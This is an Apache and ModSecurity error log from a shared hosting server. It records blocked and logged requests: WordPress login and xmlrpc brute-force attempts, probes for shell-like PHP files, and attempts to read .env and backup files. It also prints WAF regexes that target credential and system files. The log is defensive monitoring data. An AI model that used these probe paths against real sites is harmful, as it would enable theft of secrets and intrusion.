[Tue May 26 16:18:29.989514 2026] [security2:error] [pid 782634:tid 782825] [client 218.155.182.63:49302] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahV6ff_P9qBfeb1w76ZaxgAAAD0"]
[Tue May 26 16:18:30.948036 2026] [security2:error] [pid 782634:tid 782769] [client 20.151.112.53:6730] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.amostracomunicacao.com.br.md-74.webhostbox.net"] [uri "/x.php"] [unique_id "ahV6fv_P9qBfeb1w76Za2gAAAAU"]
[Tue May 26 16:18:30.948134 2026] [security2:error] [pid 782634:tid 782769] [client 20.151.112.53:6730] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.amostracomunicacao.com.br.md-74.webhostbox.net"] [uri "/x.php"] [unique_id "ahV6fv_P9qBfeb1w76Za2gAAAAU"]
[Tue May 26 16:18:31.580108 2026] [security2:error] [pid 782634:tid 782808] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6f__P9qBfeb1w76Za4AAAACw"]
[Tue May 26 16:18:32.871999 2026] [security2:error] [pid 782634:tid 782651] [remote 52.18.195.140:36628] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 140.195.18.52.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahV6gP_P9qBfeb1w76Za-AAAMxA"]
[Tue May 26 16:18:33.461618 2026] [security2:error] [pid 782634:tid 782825] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6gf_P9qBfeb1w76Za_wAAAD0"]
[Tue May 26 16:18:34.098580 2026] [security2:error] [pid 782634:tid 782817] [client 20.151.112.53:6960] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.amostracomunicacao.com.br.md-74.webhostbox.net"] [uri "/201.php"] [unique_id "ahV6gv_P9qBfeb1w76ZbEgAAADU"]
[Tue May 26 16:18:34.098728 2026] [security2:error] [pid 782634:tid 782817] [client 20.151.112.53:6960] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.amostracomunicacao.com.br.md-74.webhostbox.net"] [uri "/201.php"] [unique_id "ahV6gv_P9qBfeb1w76ZbEgAAADU"]
[Tue May 26 16:18:34.405319 2026] [security2:error] [pid 782634:tid 782863] [client 106.219.85.83:24357] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV6gv_P9qBfeb1w76ZbFgAAAGM"]
[Tue May 26 16:18:34.405444 2026] [security2:error] [pid 782634:tid 782863] [client 106.219.85.83:24357] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV6gv_P9qBfeb1w76ZbFgAAAGM"]
[Tue May 26 16:18:35.000756 2026] [security2:error] [pid 782634:tid 782774] [client 114.119.149.169:32265] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.traderscafe.in"] [uri "/webinars/febinars/"] [unique_id "ahV6g__P9qBfeb1w76ZbLAAAAAo"], referer: https://www.traderscafe.in/webinars/febinars/?shop_view=grid_view&stock_status=instock&on_sale=onsale
[Tue May 26 16:18:35.078977 2026] [security2:error] [pid 782634:tid 782810] [client 20.151.112.53:14721] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.amostracomunicacao.com.br.md-74.webhostbox.net"] [uri "/ops.php"] [unique_id "ahV6g__P9qBfeb1w76ZbLQAAAC4"]
[Tue May 26 16:18:35.079150 2026] [security2:error] [pid 782634:tid 782810] [client 20.151.112.53:14721] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.amostracomunicacao.com.br.md-74.webhostbox.net"] [uri "/ops.php"] [unique_id "ahV6g__P9qBfeb1w76ZbLQAAAC4"]
[Tue May 26 16:18:35.403914 2026] [security2:error] [pid 782634:tid 782829] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6gv_P9qBfeb1w76ZbKwAAAEE"]
[Tue May 26 16:18:35.964361 2026] [security2:error] [pid 782634:tid 782836] [client 218.155.182.63:49309] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahV6g__P9qBfeb1w76ZbQAAAAEg"]
[Tue May 26 16:18:37.430845 2026] [security2:error] [pid 782634:tid 782773] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6hf_P9qBfeb1w76ZbYAAAAAk"]
[Tue May 26 16:18:37.525785 2026] [security2:error] [pid 782634:tid 782784] [client 165.140.119.146:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahV6hf_P9qBfeb1w76ZbbgAAABQ"], referer: https://www.bloggertarget.com
[Tue May 26 16:18:37.626757 2026] [security2:error] [pid 782634:tid 782884] [client 20.151.112.53:21131] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.amostracomunicacao.com.br.md-74.webhostbox.net"] [uri "/samll.php"] [unique_id "ahV6hf_P9qBfeb1w76ZbdgAAAHg"]
[Tue May 26 16:18:37.626871 2026] [security2:error] [pid 782634:tid 782884] [client 20.151.112.53:21131] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.amostracomunicacao.com.br.md-74.webhostbox.net"] [uri "/samll.php"] [unique_id "ahV6hf_P9qBfeb1w76ZbdgAAAHg"]
[Tue May 26 16:18:38.604993 2026] [security2:error] [pid 782634:tid 782873] [client 45.226.61.26:38834] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahV6hv_P9qBfeb1w76ZbgAAAAG0"]
[Tue May 26 16:18:38.917179 2026] [security2:error] [pid 782634:tid 782768] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6hv_P9qBfeb1w76ZbkAAAAAQ"]
[Tue May 26 16:18:39.058285 2026] [security2:error] [pid 782634:tid 782795] [client 62.244.225.226:40907] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahV6hv_P9qBfeb1w76ZblwAAAB8"]
[Tue May 26 16:18:39.840729 2026] [security2:error] [pid 782634:tid 782851] [client 20.151.112.53:13526] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.amostracomunicacao.com.br.md-74.webhostbox.net"] [uri "/ingfo.php"] [unique_id "ahV6h__P9qBfeb1w76ZbrQAAAFc"]
[Tue May 26 16:18:39.840858 2026] [security2:error] [pid 782634:tid 782851] [client 20.151.112.53:13526] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.amostracomunicacao.com.br.md-74.webhostbox.net"] [uri "/ingfo.php"] [unique_id "ahV6h__P9qBfeb1w76ZbrQAAAFc"]
[Tue May 26 16:18:41.056219 2026] [security2:error] [pid 782634:tid 782716] [remote 88.198.165.116:52430] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.165.198.88.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahV6iP_P9qBfeb1w76Zb0wAAfFE"]
[Tue May 26 16:18:41.235265 2026] [security2:error] [pid 782634:tid 782867] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6iP_P9qBfeb1w76ZbyQAAAGc"]
[Tue May 26 16:18:41.408650 2026] [security2:error] [pid 782634:tid 782798] [client 142.93.124.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahV6if_P9qBfeb1w76Zb1wAAACI"], referer: https://staging.unsobered.com/
[Tue May 26 16:18:41.496011 2026] [security2:error] [pid 782634:tid 782794] [client 218.152.33.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV6if_P9qBfeb1w76Zb3gAAAB4"], referer: https://www.anujtradingco.com/
[Tue May 26 16:18:41.860997 2026] [security2:error] [pid 782634:tid 782868] [client 2804:4ec:1105:5184:bc56:f1a3:ab96:52e1:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahV6if_P9qBfeb1w76Zb6AAAaBI"]
[Tue May 26 16:18:42.913877 2026] [security2:error] [pid 782634:tid 782826] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6iv_P9qBfeb1w76Zb9gAAAD4"]
[Tue May 26 16:18:43.197510 2026] [security2:error] [pid 782634:tid 782767] [client 45.226.61.26:64355] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahV6i__P9qBfeb1w76ZcCQAAAAM"]
[Tue May 26 16:18:43.495108 2026] [security2:error] [pid 782634:tid 782880] [client 218.152.33.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV6i__P9qBfeb1w76ZcDAAAAHQ"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1452838&moderation-hash=c16575e05a0e2a14fb4810f0564c991e
[Tue May 26 16:18:44.861155 2026] [security2:error] [pid 782634:tid 782885] [client 45.226.61.26:38835] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahV6jP_P9qBfeb1w76ZcQgAAAHk"]
[Tue May 26 16:18:44.942277 2026] [security2:error] [pid 782634:tid 782883] [client 106.219.85.83:7813] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV6jP_P9qBfeb1w76ZcRQAAAHc"]
[Tue May 26 16:18:44.942394 2026] [security2:error] [pid 782634:tid 782883] [client 106.219.85.83:7813] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV6jP_P9qBfeb1w76ZcRQAAAHc"]
[Tue May 26 16:18:44.991485 2026] [security2:error] [pid 782634:tid 782797] [client 74.7.175.186:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.bookmyitem.com.whitesun.in"] [uri "/index.php"] [unique_id "ahV6i__P9qBfeb1w76ZcJQAAACE"]
[Tue May 26 16:18:44.995061 2026] [security2:error] [pid 782634:tid 782850] [client 74.7.175.186:46378] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.bookmyitem.com.whitesun.in"] [uri "/robots.txt"] [unique_id "ahV6i__P9qBfeb1w76ZcHgAAVlo"]
[Tue May 26 16:18:45.040218 2026] [security2:error] [pid 782634:tid 782765] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6jP_P9qBfeb1w76ZcOwAAAAE"]
[Tue May 26 16:18:45.781817 2026] [security2:error] [pid 782634:tid 782847] [client 20.29.64.60:3073] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "srsglobalsoft.com"] [uri "/wp-plain.php"] [unique_id "ahV6jf_P9qBfeb1w76ZcWwAAAFM"], referer: www.google.com
[Tue May 26 16:18:45.791127 2026] [security2:error] [pid 782634:tid 782804] [client 20.29.64.60:3107] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "srsglobalsoft.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahV6jf_P9qBfeb1w76ZcXwAAACg"], referer: www.google.com
[Tue May 26 16:18:46.370897 2026] [security2:error] [pid 782634:tid 782815] [client 20.29.64.60:3098] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV6jf_P9qBfeb1w76ZcYAAAADM"], referer: www.google.com
[Tue May 26 16:18:46.747617 2026] [security2:error] [pid 782634:tid 782711] [remote 74.7.241.58:39344] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahV6jv_P9qBfeb1w76ZcbwAARkw"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes
[Tue May 26 16:18:46.882674 2026] [security2:error] [pid 782634:tid 782825] [client 20.29.64.60:3098] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV6jv_P9qBfeb1w76ZccwAAAD0"], referer: www.google.com
[Tue May 26 16:18:47.245911 2026] [security2:error] [pid 782634:tid 782833] [client 20.151.112.53:21122] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.amostracomunicacao.com.br.md-74.webhostbox.net"] [uri "/c55cdler.php"] [unique_id "ahV6j__P9qBfeb1w76ZcfwAAAEU"]
[Tue May 26 16:18:47.245998 2026] [security2:error] [pid 782634:tid 782833] [client 20.151.112.53:21122] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.amostracomunicacao.com.br.md-74.webhostbox.net"] [uri "/c55cdler.php"] [unique_id "ahV6j__P9qBfeb1w76ZcfwAAAEU"]
[Tue May 26 16:18:47.663767 2026] [security2:error] [pid 782634:tid 782876] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6j__P9qBfeb1w76ZcfgAAAHA"]
[Tue May 26 16:18:47.940221 2026] [autoindex:error] [pid 782634:tid 782774] [client 178.20.47.39:50343] AH01276: Cannot serve directory /home1/newde164/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://newdental.com.co/
[Tue May 26 16:18:48.517468 2026] [security2:error] [pid 782634:tid 782790] [client 218.152.33.180:53145] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 180.33.152.218.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahV6kP_P9qBfeb1w76ZckwAAABo"], referer: https://anujtradingco.com
[Tue May 26 16:18:48.748452 2026] [autoindex:error] [pid 782634:tid 782815] [client 178.20.47.39:51020] AH01276: Cannot serve directory /home1/newde164/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://newdental.com.co/
[Tue May 26 16:18:49.004724 2026] [security2:error] [pid 782634:tid 782800] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6kP_P9qBfeb1w76ZcmwAAACQ"]
[Tue May 26 16:18:49.190832 2026] [autoindex:error] [pid 782634:tid 782860] [client 45.45.237.225:53318] AH01276: Cannot serve directory /home2/svijakqj/dglmmm.org.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:18:49.238500 2026] [security2:error] [pid 782634:tid 782813] [client 45.226.61.26:64362] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahV6kf_P9qBfeb1w76ZcqwAAADE"]
[Tue May 26 16:18:49.266552 2026] [security2:error] [pid 782634:tid 782767] [client 45.45.237.225:53324] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "dglmmm.org.in"] [uri "/.env"] [unique_id "ahV6kf_P9qBfeb1w76ZcrgAAAAM"]
[Tue May 26 16:18:49.339011 2026] [security2:error] [pid 782634:tid 782781] [client 45.45.237.225:53302] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "dglmmm.org.in"] [uri "/.env.development"] [unique_id "ahV6kf_P9qBfeb1w76ZcswAAABE"]
[Tue May 26 16:18:49.339111 2026] [security2:error] [pid 782634:tid 782781] [client 45.45.237.225:53302] ModSecurity: Warning. Matched phrase "CCBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "dglmmm.org.in"] [uri "/.env.development"] [unique_id "ahV6kf_P9qBfeb1w76ZcswAAABE"]
[Tue May 26 16:18:49.417529 2026] [security2:error] [pid 782634:tid 782829] [client 45.45.237.225:53362] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "dglmmm.org.in"] [uri "/.env.bak"] [unique_id "ahV6kf_P9qBfeb1w76ZcvgAAAEE"]
[Tue May 26 16:18:49.417787 2026] [security2:error] [pid 782634:tid 782839] [client 45.45.237.225:53450] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "dglmmm.org.in"] [uri "/firebase.json"] [unique_id "ahV6kf_P9qBfeb1w76ZcwwAAAEs"]
[Tue May 26 16:18:49.417861 2026] [security2:error] [pid 782634:tid 782839] [client 45.45.237.225:53450] ModSecurity: Warning. Matched phrase "CCBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "dglmmm.org.in"] [uri "/firebase.json"] [unique_id "ahV6kf_P9qBfeb1w76ZcwwAAAEs"]
[Tue May 26 16:18:49.419635 2026] [security2:error] [pid 782634:tid 782851] [client 45.45.237.225:53380] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "dglmmm.org.in"] [uri "/.env.backup"] [unique_id "ahV6kf_P9qBfeb1w76ZcwQAAAFc"]
[Tue May 26 16:18:50.037216 2026] [security2:error] [pid 782634:tid 782850] [client 218.152.33.180:53215] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahV6kf_P9qBfeb1w76Zc1QAAAFY"], referer: https://anujtradingco.com
[Tue May 26 16:18:50.399924 2026] [security2:error] [pid 782634:tid 782826] [client 168.90.31.208:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahV6kv_P9qBfeb1w76Zc3gAAAD4"], referer: https://staging.unsobered.com/
